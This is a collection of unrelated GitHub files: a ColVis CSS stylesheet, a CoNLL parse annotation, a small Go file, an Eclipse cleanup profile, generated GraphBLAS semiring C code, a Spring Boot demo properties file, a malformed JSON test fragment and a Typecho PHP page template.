background: -webkit-linear-gradient(top, #ffffff 0%,#f3f3f3 89%,#f9f9f9 100%); /* Chrome10+,Safari5.1+ */
background: -moz-linear-gradient(top, #ffffff 0%,#f3f3f3 89%,#f9f9f9 100%); /* FF3.6+ */
background: -ms-linear-gradient(top, #ffffff 0%,#f3f3f3 89%,#f9f9f9 100%); /* IE10+ */
background: -o-linear-gradient(top, #ffffff 0%,#f3f3f3 89%,#f9f9f9 100%); /* Opera 11.10+ */
background: linear-gradient(top, #ffffff 0%,#f3f3f3 89%,#f9f9f9 100%); /* W3C */
filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#ffffff', endColorstr='#f9f9f9',GradientType=0 ); /* IE6-9 */
}
.ColVis_Button:hover,
ul.ColVis_collection li:hover {
border: 1px solid #666;
text-decoration: none !important;
-webkit-box-shadow: 1px 1px 3px #999;
-moz-box-shadow: 1px 1px 3px #999;
-ms-box-shadow: 1px 1px 3px #999;
-o-box-shadow: 1px 1px 3px #999;
box-shadow: 1px 1px 3px #999;
background: #f3f3f3; /* Old browsers */
background: -webkit-linear-gradient(top, #f3f3f3 0%,#e2e2e2 89%,#f4f4f4 100%); /* Chrome10+,Safari5.1+ */
background: -moz-linear-gradient(top, #f3f3f3 0%,#e2e2e2 89%,#f4f4f4 100%); /* FF3.6+ */
background: -ms-linear-gradient(top, #f3f3f3 0%,#e2e2e2 89%,#f4f4f4 100%); /* IE10+ */
background: -o-linear-gradient(top, #f3f3f3 0%,#e2e2e2 89%,#f4f4f4 100%); /* Opera 11.10+ */
background: linear-gradient(top, #f3f3f3 0%,#e2e2e2 89%,#f4f4f4 100%); /* W3C */
filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#f3f3f3', endColorstr='#f4f4f4',GradientType=0 ); /* IE6-9 */
}
button.ColVis_Button {
height: 30px;
padding: 3px 8px;
}
button.ColVis_Button::-moz-focus-inner {
border: none !important;
padding: 0;
}
button.ColVis_Button:active {
outline: none;
}
div.ColVis_collectionBackground {
position: fixed;
top: 0;
left: 0;
height: 100%;
width: 100%;
background-color: black;
z-index: 1100;
}
ul.ColVis_collection {
list-style: none;
width: 150px;
padding: 8px 8px 4px 8px;
margin: 0;
border: 1px solid #ccc;
border: 1px solid rgba( 0, 0, 0, 0.4 );
background-color: #f3f3f3;
background-color: rgba( 255, 255, 255, 0.3 );
overflow: hidden;
z-index: 2002;
-webkit-border-radius: 5px;
-moz-border-radius: 5px;
-ms-border-radius: 5px;
-o-border-radius: 5px;
border-radius: 5px;
-webkit-box-shadow: 3px 3px 5px rgba(0, 0, 0, 0.3);
-moz-box-shadow: 3px 3px 5px rgba(0, 0, 0, 0.3);
-ms-box-shadow: 3px 3px 5px rgba(0, 0, 0, 0.3);
-o-box-shadow: 3px 3px 5px rgba(0, 0, 0, 0.3);
box-shadow: 3px 3px 5px rgba(0, 0, 0, 0.3);
}
ul.ColVis_collection li {
position: relative;
height: auto;
left: 0;
right: 0;
padding: 0.5em;
display: block;
float: none;
margin-bottom: 4px;
-webkit-box-shadow: 1px 1px 3px #999;
-moz-box-shadow: 1px 1px 3px #999;
-ms-box-shadow: 1px 1px 3px #999;
-o-box-shadow: 1px 1px 3px #999;
box-shadow: 1px 1px 3px #999;
}
ul.ColVis_collection li {
text-align: left;
}
ul.ColVis_collection li.ColVis_Button:hover {
border: 1px solid #999;
background-color: #f0f0f0;
}
ul.ColVis_collection li span {
display: inline-block;
padding-left: 0.5em;
cursor: pointer;
}
ul.ColVis_collection li.ColVis_Special {
border-color: #555;
background: rgb(237,237,237); /* Old browsers */
background: -webkit-linear-gradient(top, rgba(237,237,237,1) 0%,rgba(214,214,214,1) 77%,rgba(232,232,232,1) 100%); /* Chrome10+,Safari5.1+ */
background: -moz-linear-gradient(top, rgba(237,237,237,1) 0%, rgba(214,214,214,1) 77%, rgba(232,232,232,1) 100%); /* FF3.6+ */
background: -ms-linear-gradient(top, rgba(237,237,237,1) 0%,rgba(214,214,214,1) 77%,rgba(232,232,232,1) 100%); /* IE10+ */
background: -o-linear-gradient(top, rgba(237,237,237,1) 0%,rgba(214,214,214,1) 77%,rgba(232,232,232,1) 100%); /* Opera 11.10+ */
background: linear-gradient(to bottom, rgba(237,237,237,1) 0%,rgba(214,214,214,1) 77%,rgba(232,232,232,1) 100%); /* W3C */
filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#ededed', endColorstr='#e8e8e8',GradientType=0 ); /* IE6-9 */
}
ul.ColVis_collection li.ColVis_Special:hover {
background: #e2e2e2; /* Old browsers */
background: -webkit-linear-gradient(top, #d0d0d0 0%,#d5d5d5 89%,#e2e2e2 100%); /* Chrome10+,Safari5.1+ */
background: -moz-linear-gradient(top, #d0d0d0 0%,#d5d5d5 89%,#e2e2e2 100%); /* FF3.6+ */
background: -ms-linear-gradient(top, #d0d0d0 0%,#d5d5d5 89%,#e2e2e2 100%); /* IE10+ */
background: -o-linear-gradient(top, #d0d0d0 0%,#d5d5d5 89%,#e2e2e2 100%); /* Opera 11.10+ */
background: linear-gradient(top, #d0d0d0 0%,#d5d5d5 89%,#e2e2e2 100%); /* W3C */
filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#f3f3f3', endColorstr='#e2e2e2',GradientType=0 ); /* IE6-9 */
}
span.ColVis_radio {
display: inline-block;
width: 20px;
}
div.ColVis_catcher {
position: absolute;
z-index: 1101;
}
.disabled {
color: #999;
}
| {
"pile_set_name": "Github"
} |
#begin document (wb/sel/26/sel_2693); part 000
wb/sel/26/sel_2693 -1 0 [WORD] NNP (TOP(S(S(NP* - - - - * -
wb/sel/26/sel_2693 -1 1 [WORD] NNP *) - - - - * -
wb/sel/26/sel_2693 -1 2 [WORD] RB (ADVP*) - - - - * -
wb/sel/26/sel_2693 -1 3 [WORD] VBD (VP* punch - 1 - * -
wb/sel/26/sel_2693 -1 4 [WORD] PRP (NP*) - - - - * -
wb/sel/26/sel_2693 -1 5 [WORD] RB (ADVP*) - - - - * -
wb/sel/26/sel_2693 -1 6 [WORD] IN (PP* - - - - * -
wb/sel/26/sel_2693 -1 7 [WORD] DT (NP* - - - - * -
wb/sel/26/sel_2693 -1 8 [WORD] NN *)))) - - - - * -
wb/sel/26/sel_2693 -1 9 [WORD] CC * - - - - * -
wb/sel/26/sel_2693 -1 10 [WORD] PRP (S(NP*) - - - - * -
wb/sel/26/sel_2693 -1 11 [WORD] VBD (VP* - - - - * -
wb/sel/26/sel_2693 -1 12 [WORD] `` * - - - - * -
wb/sel/26/sel_2693 -1 13 [WORD] DT (S(NP* - - - - * -
wb/sel/26/sel_2693 -1 14 [WORD] JJ * - - - - * -
wb/sel/26/sel_2693 -1 15 [WORD] NNS *) - - - - * -
wb/sel/26/sel_2693 -1 16 [WORD] VBP (VP* - - - - * -
wb/sel/26/sel_2693 -1 17 [WORD] RB * - - - - * -
wb/sel/26/sel_2693 -1 18 [WORD] VB (VP* - - - - * -
wb/sel/26/sel_2693 -1 19 [WORD] TO (S(VP* - - - - * -
wb/sel/26/sel_2693 -1 20 [WORD] VB (VP* - - - - * -
wb/sel/26/sel_2693 -1 21 [WORD] RB (ADVP* - - - - * -
wb/sel/26/sel_2693 -1 22 [WORD] IN (PP* - - - - * -
wb/sel/26/sel_2693 -1 23 [WORD] PRP$ (NP* - - - - * -
wb/sel/26/sel_2693 -1 24 [WORD] NN *))))))))))) - - - - * -
wb/sel/26/sel_2693 -1 25 [WORD] . * - - - - * -
wb/sel/26/sel_2693 -1 26 [WORD] '' *)) - - - - * -
#end document
| {
"pile_set_name": "Github"
} |
// +build !race
package mgo
const raceDetector = false
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<profiles version="2">
<profile kind="CleanUpProfile" name="geowave-cleanup" version="2">
<setting id="cleanup.remove_redundant_type_arguments" value="true"/>
<setting id="cleanup.remove_unused_private_fields" value="true"/>
<setting id="cleanup.always_use_parentheses_in_expressions" value="true"/>
<setting id="cleanup.never_use_blocks" value="false"/>
<setting id="cleanup.add_missing_deprecated_annotations" value="true"/>
<setting id="cleanup.remove_unused_private_methods" value="true"/>
<setting id="cleanup.convert_to_enhanced_for_loop" value="false"/>
<setting id="cleanup.remove_unnecessary_nls_tags" value="true"/>
<setting id="cleanup.sort_members" value="false"/>
<setting id="cleanup.remove_unused_local_variables" value="false"/>
<setting id="cleanup.remove_unused_private_members" value="false"/>
<setting id="cleanup.never_use_parentheses_in_expressions" value="false"/>
<setting id="cleanup.remove_unnecessary_casts" value="true"/>
<setting id="cleanup.make_parameters_final" value="true"/>
<setting id="cleanup.use_this_for_non_static_field_access" value="true"/>
<setting id="cleanup.use_blocks" value="true"/>
<setting id="cleanup.remove_private_constructors" value="true"/>
<setting id="cleanup.always_use_this_for_non_static_method_access" value="false"/>
<setting id="cleanup.remove_trailing_whitespaces_all" value="true"/>
<setting id="cleanup.always_use_this_for_non_static_field_access" value="false"/>
<setting id="cleanup.use_this_for_non_static_field_access_only_if_necessary" value="true"/>
<setting id="cleanup.add_default_serial_version_id" value="true"/>
<setting id="cleanup.make_type_abstract_if_missing_method" value="false"/>
<setting id="cleanup.qualify_static_member_accesses_through_subtypes_with_declaring_class" value="true"/>
<setting id="cleanup.make_variable_declarations_final" value="true"/>
<setting id="cleanup.add_missing_nls_tags" value="false"/>
<setting id="cleanup.format_source_code" value="false"/>
<setting id="cleanup.add_missing_override_annotations" value="true"/>
<setting id="cleanup.qualify_static_method_accesses_with_declaring_class" value="false"/>
<setting id="cleanup.remove_unused_private_types" value="true"/>
<setting id="cleanup.convert_functional_interfaces" value="false"/>
<setting id="cleanup.use_anonymous_class_creation" value="false"/>
<setting id="cleanup.use_type_arguments" value="false"/>
<setting id="cleanup.make_local_variable_final" value="true"/>
<setting id="cleanup.add_missing_methods" value="false"/>
<setting id="cleanup.add_missing_override_annotations_interface_methods" value="true"/>
<setting id="cleanup.correct_indentation" value="false"/>
<setting id="cleanup.remove_unused_imports" value="true"/>
<setting id="cleanup.remove_trailing_whitespaces_ignore_empty" value="false"/>
<setting id="cleanup.make_private_fields_final" value="true"/>
<setting id="cleanup.add_generated_serial_version_id" value="false"/>
<setting id="cleanup.organize_imports" value="true"/>
<setting id="cleanup.sort_members_all" value="false"/>
<setting id="cleanup.remove_trailing_whitespaces" value="true"/>
<setting id="cleanup.insert_inferred_type_arguments" value="false"/>
<setting id="cleanup.use_blocks_only_for_return_and_throw" value="false"/>
<setting id="cleanup.use_parentheses_in_expressions" value="true"/>
<setting id="cleanup.add_missing_annotations" value="true"/>
<setting id="cleanup.use_lambda" value="true"/>
<setting id="cleanup.qualify_static_field_accesses_with_declaring_class" value="false"/>
<setting id="cleanup.use_this_for_non_static_method_access_only_if_necessary" value="true"/>
<setting id="cleanup.use_this_for_non_static_method_access" value="true"/>
<setting id="cleanup.qualify_static_member_accesses_through_instances_with_declaring_class" value="true"/>
<setting id="cleanup.add_serial_version_id" value="true"/>
<setting id="cleanup.always_use_blocks" value="true"/>
<setting id="cleanup.qualify_static_member_accesses_with_declaring_class" value="true"/>
<setting id="cleanup.format_source_code_changes_only" value="false"/>
</profile>
</profiles>
| {
"pile_set_name": "Github"
} |
//------------------------------------------------------------------------------
// GB_AxB: hard-coded functions for semiring: C<M>=A*B or A'*B
//------------------------------------------------------------------------------
// SuiteSparse:GraphBLAS, Timothy A. Davis, (c) 2017-2020, All Rights Reserved.
// http://suitesparse.com See GraphBLAS/Doc/License.txt for license.
//------------------------------------------------------------------------------
// If this file is in the Generated/ folder, do not edit it (auto-generated).
#include "GB.h"
#ifndef GBCOMPACT
#include "GB_control.h"
#include "GB_ek_slice.h"
#include "GB_bracket.h"
#include "GB_sort.h"
#include "GB_atomics.h"
#include "GB_AxB_saxpy3.h"
#include "GB_AxB__include.h"
// The C=A*B semiring is defined by the following types and operators:
// A'*B function (dot2): GB_Adot2B__times_isge_uint8
// A'*B function (dot3): GB_Adot3B__times_isge_uint8
// C+=A'*B function (dot4): GB_Adot4B__times_isge_uint8
// A*B function (saxpy3): GB_Asaxpy3B__times_isge_uint8
// C type: uint8_t
// A type: uint8_t
// B type: uint8_t
// Multiply: z = (aik >= bkj)
// Add: cij *= z
// 'any' monoid? 0
// atomic? 1
// OpenMP atomic? 1
// MultAdd: cij *= (aik >= bkj)
// Identity: 1
// Terminal: if (cij == 0) { cij_is_terminal = true ; break ; }
#define GB_ATYPE \
uint8_t
#define GB_BTYPE \
uint8_t
#define GB_CTYPE \
uint8_t
// true for int64, uint64, float, double, float complex, and double complex
#define GB_CTYPE_IGNORE_OVERFLOW \
0
// aik = Ax [pA]
#define GB_GETA(aik,Ax,pA) \
uint8_t aik = Ax [pA]
// bkj = Bx [pB]
#define GB_GETB(bkj,Bx,pB) \
uint8_t bkj = Bx [pB]
#define GB_CX(p) Cx [p]
// multiply operator
#define GB_MULT(z, x, y) \
z = (x >= y)
// cast from a real scalar (or 2, if C is complex) to the type of C
#define GB_CTYPE_CAST(x,y) \
((uint8_t) x)
// multiply-add
#define GB_MULTADD(z, x, y) \
z *= (x >= y)
// monoid identity value
#define GB_IDENTITY \
1
// break if cij reaches the terminal value (dot product only)
#define GB_DOT_TERMINAL(cij) \
if (cij == 0) { cij_is_terminal = true ; break ; }
// simd pragma for dot-product loop vectorization
#define GB_PRAGMA_SIMD_DOT(cij) \
;
// simd pragma for other loop vectorization
#define GB_PRAGMA_SIMD_VECTORIZE GB_PRAGMA_SIMD
// 1 for the PLUS_PAIR_(real) semirings, not for the complex case
#define GB_IS_PLUS_PAIR_REAL_SEMIRING \
0
// declare the cij scalar
#if GB_IS_PLUS_PAIR_REAL_SEMIRING
// also initialize cij to zero
#define GB_CIJ_DECLARE(cij) \
uint8_t cij = 0
#else
// all other semirings: just declare cij, do not initialize it
#define GB_CIJ_DECLARE(cij) \
uint8_t cij
#endif
// save the value of C(i,j)
#define GB_CIJ_SAVE(cij,p) Cx [p] = cij
// cij = Cx [pC]
#define GB_GETC(cij,pC) \
cij = Cx [pC]
// Cx [pC] = cij
#define GB_PUTC(cij,pC) \
Cx [pC] = cij
// Cx [p] = t
#define GB_CIJ_WRITE(p,t) Cx [p] = t
// C(i,j) += t
#define GB_CIJ_UPDATE(p,t) \
Cx [p] *= t
// x + y
#define GB_ADD_FUNCTION(x,y) \
x * y
// type with size of GB_CTYPE, and can be used in compare-and-swap
#define GB_CTYPE_PUN \
uint8_t
// bit pattern for bool, 8-bit, 16-bit, and 32-bit integers
#define GB_CTYPE_BITS \
0xffL
// 1 if monoid update can skipped entirely (the ANY monoid)
#define GB_IS_ANY_MONOID \
0
// 1 if monoid update is EQ
#define GB_IS_EQ_MONOID \
0
// 1 if monoid update can be done atomically, 0 otherwise
#define GB_HAS_ATOMIC \
1
// 1 if monoid update can be done with an OpenMP atomic update, 0 otherwise
#if GB_MICROSOFT
#define GB_HAS_OMP_ATOMIC \
1
#else
#define GB_HAS_OMP_ATOMIC \
1
#endif
// 1 for the ANY_PAIR semirings
#define GB_IS_ANY_PAIR_SEMIRING \
0
// 1 if PAIR is the multiply operator
#define GB_IS_PAIR_MULTIPLIER \
0
// 1 if monoid is PLUS_FC32
#define GB_IS_PLUS_FC32_MONOID \
0
// 1 if monoid is PLUS_FC64
#define GB_IS_PLUS_FC64_MONOID \
0
// atomic compare-exchange
#define GB_ATOMIC_COMPARE_EXCHANGE(target, expected, desired) \
GB_ATOMIC_COMPARE_EXCHANGE_8 (target, expected, desired)
#if GB_IS_ANY_PAIR_SEMIRING
// result is purely symbolic; no numeric work to do. Hx is not used.
#define GB_HX_WRITE(i,t)
#define GB_CIJ_GATHER(p,i)
#define GB_HX_UPDATE(i,t)
#define GB_CIJ_MEMCPY(p,i,len)
#else
// Hx [i] = t
#define GB_HX_WRITE(i,t) Hx [i] = t
// Cx [p] = Hx [i]
#define GB_CIJ_GATHER(p,i) Cx [p] = Hx [i]
// Hx [i] += t
#define GB_HX_UPDATE(i,t) \
Hx [i] *= t
// memcpy (&(Cx [p]), &(Hx [i]), len)
#define GB_CIJ_MEMCPY(p,i,len) \
memcpy (Cx +(p), Hx +(i), (len) * sizeof(uint8_t))
#endif
// disable this semiring and use the generic case if these conditions hold
#define GB_DISABLE \
(GxB_NO_TIMES || GxB_NO_ISGE || GxB_NO_UINT8 || GxB_NO_TIMES_UINT8 || GxB_NO_ISGE_UINT8 || GxB_NO_TIMES_ISGE_UINT8)
//------------------------------------------------------------------------------
// C=A'*B or C<!M>=A'*B: dot product (phase 2)
//------------------------------------------------------------------------------
GrB_Info GB_Adot2B__times_isge_uint8
(
GrB_Matrix C,
const GrB_Matrix M, const bool Mask_struct,
const GrB_Matrix *Aslice, bool A_is_pattern,
const GrB_Matrix B, bool B_is_pattern,
int64_t *GB_RESTRICT B_slice,
int64_t *GB_RESTRICT *C_counts,
int nthreads, int naslice, int nbslice
)
{
// C<M>=A'*B now uses dot3
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#define GB_PHASE_2_OF_2
#include "GB_AxB_dot2_meta.c"
#undef GB_PHASE_2_OF_2
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C<M>=A'*B: masked dot product method (phase 2)
//------------------------------------------------------------------------------
GrB_Info GB_Adot3B__times_isge_uint8
(
GrB_Matrix C,
const GrB_Matrix M, const bool Mask_struct,
const GrB_Matrix A, bool A_is_pattern,
const GrB_Matrix B, bool B_is_pattern,
const GB_task_struct *GB_RESTRICT TaskList,
const int ntasks,
const int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#include "GB_AxB_dot3_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C+=A'*B: dense dot product
//------------------------------------------------------------------------------
GrB_Info GB_Adot4B__times_isge_uint8
(
GrB_Matrix C,
const GrB_Matrix A, bool A_is_pattern,
int64_t *GB_RESTRICT A_slice, int naslice,
const GrB_Matrix B, bool B_is_pattern,
int64_t *GB_RESTRICT B_slice, int nbslice,
const int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#include "GB_AxB_dot4_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C=A*B, C<M>=A*B, C<!M>=A*B: saxpy3 method (Gustavson + Hash)
//------------------------------------------------------------------------------
#include "GB_AxB_saxpy3_template.h"
GrB_Info GB_Asaxpy3B__times_isge_uint8
(
GrB_Matrix C,
const GrB_Matrix M, bool Mask_comp, const bool Mask_struct,
const GrB_Matrix A, bool A_is_pattern,
const GrB_Matrix B, bool B_is_pattern,
GB_saxpy3task_struct *GB_RESTRICT TaskList,
const int ntasks,
const int nfine,
const int nthreads,
GB_Context Context
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#include "GB_AxB_saxpy3_template.c"
return (GrB_SUCCESS) ;
#endif
}
#endif
| {
"pile_set_name": "Github"
} |
server.port=80
# \u6570\u636E\u6E90\u914D\u7F6E
spring.datasource.url=jdbc:h2:mem:ssb_test
spring.datasource.driver-class-name=org.h2.Driver
spring.datasource.username=root
spring.datasource.password=root
spring.datasource.schema=classpath:db/schema.sql
spring.datasource.data=classpath:db/data.sql
# \u8FDB\u884C\u8BE5\u914D\u7F6E\u540E\uFF0Ch2 web consloe\u5C31\u53EF\u4EE5\u5728\u8FDC\u7A0B\u8BBF\u95EE\u4E86\u3002\u5426\u5219\u53EA\u80FD\u5728\u672C\u673A\u8BBF\u95EE\u3002
spring.h2.console.settings.web-allow-others=true
# \u8FDB\u884C\u8BE5\u914D\u7F6E\uFF0C\u4F60\u5C31\u53EF\u4EE5\u901A\u8FC7YOUR_URL/h2-console\u8BBF\u95EEh2 web consloe\u3002YOUR_URL\u662F\u4F60\u7A0B\u5E8F\u7684\u8BBF\u95EEURl\u3002
spring.h2.console.path=/h2-console
#\u8FDE\u63A5\u6C60\u914D\u7F6E
spring.datasource.type=org.apache.commons.dbcp2.BasicDataSource
#\u521D\u59CB\u5316\u8FDE\u63A5:\u8FDE\u63A5\u6C60\u542F\u52A8\u65F6\u521B\u5EFA\u7684\u521D\u59CB\u5316\u8FDE\u63A5\u6570\u91CF
spring.datasource.dbcp2.initial-size=50
#\u6700\u5927\u6D3B\u52A8\u8FDE\u63A5:\u8FDE\u63A5\u6C60\u5728\u540C\u4E00\u65F6\u95F4\u80FD\u591F\u5206\u914D\u7684\u6700\u5927\u6D3B\u52A8\u8FDE\u63A5\u7684\u6570\u91CF, \u5982\u679C\u8BBE\u7F6E\u4E3A\u975E\u6B63\u6570\u5219\u8868\u793A\u4E0D\u9650\u5236
spring.datasource.dbcp2.max-active=250
#\u6700\u5927\u7A7A\u95F2\u8FDE\u63A5:\u8FDE\u63A5\u6C60\u4E2D\u5BB9\u8BB8\u4FDD\u6301\u7A7A\u95F2\u72B6\u6001\u7684\u6700\u5927\u8FDE\u63A5\u6570\u91CF,\u8D85\u8FC7\u7684\u7A7A\u95F2\u8FDE\u63A5\u5C06\u88AB\u91CA\u653E,\u5982\u679C\u8BBE\u7F6E\u4E3A\u8D1F\u6570\u8868\u793A\u4E0D\u9650\u5236
spring.datasource.dbcp2.max-idle=50
#\u6700\u5C0F\u7A7A\u95F2\u8FDE\u63A5:\u8FDE\u63A5\u6C60\u4E2D\u5BB9\u8BB8\u4FDD\u6301\u7A7A\u95F2\u72B6\u6001\u7684\u6700\u5C0F\u8FDE\u63A5\u6570\u91CF,\u4F4E\u4E8E\u8FD9\u4E2A\u6570\u91CF\u5C06\u521B\u5EFA\u65B0\u7684\u8FDE\u63A5,\u5982\u679C\u8BBE\u7F6E\u4E3A0\u5219\u4E0D\u521B\u5EFA
spring.datasource.dbcp2.min-idle=5
#\u6700\u5927\u7B49\u5F85\u65F6\u95F4:\u5F53\u6CA1\u6709\u53EF\u7528\u8FDE\u63A5\u65F6,\u8FDE\u63A5\u6C60\u7B49\u5F85\u8FDE\u63A5\u88AB\u5F52\u8FD8\u7684\u6700\u5927\u65F6\u95F4(\u4EE5\u6BEB\u79D2\u8BA1\u6570),\u8D85\u8FC7\u65F6\u95F4\u5219\u629B\u51FA\u5F02\u5E38,\u5982\u679C\u8BBE\u7F6E\u4E3A-1\u8868\u793A\u65E0\u9650\u7B49\u5F85
spring.datasource.dbcp2.max-wait-millis=10000
#SQL\u67E5\u8BE2,\u7528\u6765\u9A8C\u8BC1\u4ECE\u8FDE\u63A5\u6C60\u53D6\u51FA\u7684\u8FDE\u63A5,\u5728\u5C06\u8FDE\u63A5\u8FD4\u56DE\u7ED9\u8C03\u7528\u8005\u4E4B\u524D.\u5982\u679C\u6307\u5B9A,\u5219\u67E5\u8BE2\u5FC5\u987B\u662F\u4E00\u4E2ASQL SELECT\u5E76\u4E14\u5FC5\u987B\u8FD4\u56DE\u81F3\u5C11\u4E00\u884C\u8BB0\u5F55
spring.datasource.dbcp2.validation-query=SELECT 1
#\u5F53\u5EFA\u7ACB\u65B0\u8FDE\u63A5\u65F6\u88AB\u53D1\u9001\u7ED9JDBC\u9A71\u52A8\u7684\u8FDE\u63A5\u53C2\u6570\uFF0C\u683C\u5F0F\u5FC5\u987B\u662F [propertyName=property;]\u3002\u6CE8\u610F\uFF1A\u53C2\u6570user/password\u5C06\u88AB\u660E\u786E\u4F20\u9012\uFF0C\u6240\u4EE5\u4E0D\u9700\u8981\u5305\u62EC\u5728\u8FD9\u91CC\u3002
spring.datasource.dbcp2.connection-properties=characterEncoding=utf8
# JPA\u914D\u7F6E
#hibernate\u63D0\u4F9B\u4E86\u6839\u636E\u5B9E\u4F53\u7C7B\u81EA\u52A8\u7EF4\u62A4\u6570\u636E\u5E93\u8868\u7ED3\u6784\u7684\u529F\u80FD\uFF0C\u53EF\u901A\u8FC7spring.jpa.hibernate.ddl-auto\u6765\u914D\u7F6E\uFF0C\u6709\u4E0B\u5217\u53EF\u9009\u9879\uFF1A
#1\u3001create\uFF1A\u542F\u52A8\u65F6\u5220\u9664\u4E0A\u4E00\u6B21\u751F\u6210\u7684\u8868\uFF0C\u5E76\u6839\u636E\u5B9E\u4F53\u7C7B\u751F\u6210\u8868\uFF0C\u8868\u4E2D\u6570\u636E\u4F1A\u88AB\u6E05\u7A7A\u3002
#2\u3001create-drop\uFF1A\u542F\u52A8\u65F6\u6839\u636E\u5B9E\u4F53\u7C7B\u751F\u6210\u8868\uFF0CsessionFactory\u5173\u95ED\u65F6\u8868\u4F1A\u88AB\u5220\u9664\u3002
#3\u3001update\uFF1A\u542F\u52A8\u65F6\u4F1A\u6839\u636E\u5B9E\u4F53\u7C7B\u751F\u6210\u8868\uFF0C\u5F53\u5B9E\u4F53\u7C7B\u5C5E\u6027\u53D8\u52A8\u7684\u65F6\u5019\uFF0C\u8868\u7ED3\u6784\u4E5F\u4F1A\u66F4\u65B0\uFF0C\u5728\u521D\u671F\u5F00\u53D1\u9636\u6BB5\u4F7F\u7528\u6B64\u9009\u9879\u3002
#4\u3001validate\uFF1A\u542F\u52A8\u65F6\u9A8C\u8BC1\u5B9E\u4F53\u7C7B\u548C\u6570\u636E\u8868\u662F\u5426\u4E00\u81F4\uFF0C\u5728\u6211\u4EEC\u6570\u636E\u7ED3\u6784\u7A33\u5B9A\u65F6\u91C7\u7528\u6B64\u9009\u9879\u3002
#5\u3001none\uFF1A\u4E0D\u91C7\u53D6\u4EFB\u4F55\u63AA\u65BD\u3002
spring.jpa.hibernate.ddl-auto=update
#spring.jpa.show-sql\u7528\u6765\u8BBE\u7F6Ehibernate\u64CD\u4F5C\u7684\u65F6\u5019\u5728\u63A7\u5236\u53F0\u663E\u793A\u5176\u771F\u5B9E\u7684sql\u8BED\u53E5\u3002
spring.jpa.show-sql=true
#\u8BA9\u63A7\u5236\u5668\u8F93\u51FA\u7684json\u5B57\u7B26\u4E32\u683C\u5F0F\u66F4\u7F8E\u89C2\u3002
spring.jackson.serialization.indent-output=true
#\u65E5\u5FD7\u914D\u7F6E
logging.level.com.xiaolyuh=debug
logging.level.org.springframework.web=debug
logging.level.org.springframework.transaction=debug
logging.level.org.apache.commons.dbcp2=debug
management.port=8081
management.security.enabled=false
endpoints.shutdown.enabled=true
endpoints.beans.id=mybeans
endpoints.beans.enabled=false
endpoints.enabled=true
info.name=\u76D1\u63A7\u6D4B\u8BD5
info.version=1.0
info.autor=wyh
| {
"pile_set_name": "Github"
} |
["a",
4
,1, | {
"pile_set_name": "Github"
} |
<?php
/**
* page.php
*
* 独立页面
*
* @author 熊猫小A
*/
if (!defined('__TYPECHO_ROOT_DIR__')) exit;
?>
<?php $this->need('head.php'); ?>
<?php $this->need('header.php'); ?>
<div id="main" class="flex flex-1">
<div class="center flex-1">
<!--post-item start-->
<div id="post-list">
<?php if(!$this->have()):?>
<div class="post-item">
<div class="post-item-body" style="padding-top:0.001em"><h1 style="text-align:center;margin-top:40px;color:var(--text-color)">糟糕,是 404 的感觉</h1></div>
</div>
<?php else:?>
<div style="animation-delay:0.2s" class="post-item full">
<?php if($this->fields->type=='1' || !($this->fields->banner && $this->fields->banner!='')): ?>
<div class="post-item-header flex align-items-center" style="padding-bottom:0">
<img class="avatar" src="<?php echo Typecho_Common::gravatarUrl($this->author->mail, 100, '', '', true)?>" />
<div style="font-size: 14px; line-height: 1.5;overflow:hidden" class="post-meta flex flex-direction-column">
<span><b><?php echo $this->author->screenName; ?></b> 发表了一篇<?php if($this->fields->type=='1') echo '说说'; else echo '日志'; ?></span>
<span style="white-space:nowrap;text-overflow:ellipsis;overflow:hidden"><?php Utils::exportPostMeta($this,$this->fields->type); ?></span>
</div>
</div>
<?php elseif($this->fields->banner && $this->fields->banner!='') :?>
<a data-fancybox="gallery" href="<?php echo $this->fields->banner; ?>"><img style="max-width:100%;width:100%" src="<?php echo $this->fields->banner; ?>"/></a>
<?php endif; ?>
<div class="post-item-body <?php if($this->fields->banner && $this->is('index')) echo 'pull-left'; if($this->is('index')&&($this->fields->indextype=='1')) echo ' featured';?> flex">
<article class="yue">
<?php if(!($this->fields->type=='1')): ?>
<h1 class="post-title"><?php $this->title();?>
<?php if($this->user->hasLogin()): ?>
<sup><a target="_blank" href="<?php echo $this->options->adminUrl.'write-page.php?cid='.$this->cid;?>" class="footnote-ref"><i class="fa fa-edit"></i></a></sup>
<?php endif;?>
</h1>
<?php endif; ?>
<?php if(!$this->fields->type=='1' && ($this->fields->banner && $this->fields->banner!='')): ?>
<div class="post-item-header flex align-items-center" style="padding: 0;font-size:14px;overflow:hidden">
<span style="white-space:nowrap;text-overflow:ellipsis;overflow:hidden"><b><i class="fa fa-pencil"></i> <?php echo $this->author->screenName; ?></b> • <?php Utils::exportPostMeta($this,$this->fields->type); ?></span>
</div>
<?php endif; ?>
<?php if($this->fields->showTOC=='1'):?>
<?php
$parsed=Utils::parseTOC(Utils::parseAll($this->content));
$GLOBALS['TOC_O']=$parsed['toc'];
echo $parsed['content'];
?>
<?php else :?>
<?php echo Utils::parseAll($this->content,true); ?>
<?php endif; ?>
</article>
</div>
<div class="post-item-footer">
<?php if(Utils::isPluginAvailable('Like')):?>
<span class="like-button"><a href="javascript:;" class="post-like" data-pid="<?php echo $this->cid;?>">
<i class="fa fa-heart"></i> LIKE <span class="like-num"><?php Like_Plugin::theLike($link = false,$this);?></span>
</a></span>
<?php endif; ?>
<span>Tags:<?php $this->tags(',', true, 'none'); ?></span>
</div>
</div>
<?php endif; ?>
</div>
<!--post-item end-->
<div class="post-item" style="animation-delay:0.2s">
<div class="post-pager">
<?php Utils::thePrev($this);?>
<?php if($this->options->reward_img&&$this->options->reward_img!=''):?>
<div class="post-pager-item post-pager-reward" data-title="如果觉得不错就赞赏一下吧~"><a data-fancybox data-src="#reward" href="javascript:;"><i class="fa fa-gift"></i> 打赏</a></div>
<?php endif;?>
